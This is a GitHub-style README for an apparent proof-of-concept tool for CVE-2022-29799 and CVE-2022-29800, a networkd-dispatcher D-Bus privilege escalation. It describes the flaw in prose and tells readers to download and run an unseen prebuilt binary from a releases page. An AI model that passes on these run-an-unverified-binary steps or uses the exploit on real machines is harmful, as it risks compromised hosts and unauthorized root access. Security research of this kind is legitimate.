## https://sploitus.com/exploit?id=4E361A66-0287-5D9D-9DA5-91D2EF34D2CB
# ๐ก๏ธ NimbusPWN-CVE-2022-29799-29800 - Test local privilege escalation security flaws
[](https://github.com/pansyhebephrenic23/NimbusPWN-CVE-2022-29799-29800/releases)
## ๐ About this tool
This software helps security researchers study two specific vulnerabilities known as CVE-2022-29799 and CVE-2022-29800. These flaws exist within the networkd-dispatcher component on Linux systems. By using this tool, you can reproduce these issues in a controlled environment to verify if a system remains at risk.
This project uses the C programming language to interact with D-Bus services. It demonstrates how a local user might gain unauthorized permissions on a target machine. Security professionals use this PoC to audit system configurations and ensure that patch management policies work as intended.
## ๐ System Requirements
To run this tool, you need a environment that supports the underlying D-Bus communication protocol.
- Operating System: Linux distribution that includes networkd-dispatcher versions prior to the patches for CVE-2022-29799 and CVE-2022-29800.
- Hardware: Standard x86_64 architecture.
- Permissions: You need a standard user account to initiate the test.
- Disk Space: Less than 50 MB of free space.
## ๐ฅ Downloading the software
You must visit the official releases page to obtain the compiled software. We provide the latest version of the exploit code there.
[Click here to visit the releases page and download the files](https://github.com/pansyhebephrenic23/NimbusPWN-CVE-2022-29799-29800/releases)
1. Open the link above in your web browser.
2. Look for the "Assets" section at the bottom of the latest release.
3. Select the file relevant to your Linux distribution architecture.
4. Save the file to a location where you can easily find it, such as your Downloads folder.
## ๐ Running the program
Follow these steps to conduct your security test. We assume you possess basic knowledge of terminal commands.
1. Open your terminal window.
2. Navigate to the folder where you saved the file. Use the `cd` command followed by the folder path.
3. Make the file executable. Type `chmod +x filename` and press Enter. Replace `filename` with the actual name of the file you downloaded.
4. Run the program. Type `./filename` and press Enter.
5. Follow the on-screen instructions to trigger the proof of concept.
## ๐ Understanding the vulnerabilities
These vulnerabilities arise from how networkd-dispatcher handles D-Bus signals. The service fails to validate the origin of messages properly. This flaw allows a non-privileged user to send malicious signals to the service.
If the system processes these signals without proper checks, it executes scripts with root permissions. This creates a local privilege escalation path. The PoC included in this repository automates the creation of a temporary script. It triggers the vulnerable service to run your script with administrative access.
## ๐ ๏ธ Security best practices
Always test this software in a isolated sandbox or a virtual machine. Never run this tool on production systems unless you have explicit authorization to perform a security audit.
- Keep your system updated. Install the latest security patches from your distribution provider to fix CVE-2022-29799 and CVE-2022-29800.
- Monitor your system logs for suspicious D-Bus activity.
- Restrict user permissions to minimize the impact of potential vulnerabilities.
- Configure D-Bus security policies to prevent unauthorized message passing.
## ๐ค Support and contributions
We maintain this repository for educational and security audit purposes. If you encounter issues during the execution of the PoC, verify that your environment matches the criteria listed in the system requirements section.
We welcome feedback and improvements to the source code. You can suggest updates by creating a pull request or opening an issue in this repository. Ensure that your suggestions adhere to the security goals of the project.
## โ๏ธ Legal notice
This software serves for authorized security testing only. Use this tool responsibly. You assume full responsibility for any actions you perform using this code. We do not provide instructions on how to use this tool for illegal activities. Always ensure you have written permission before you attempt to test the security of any system.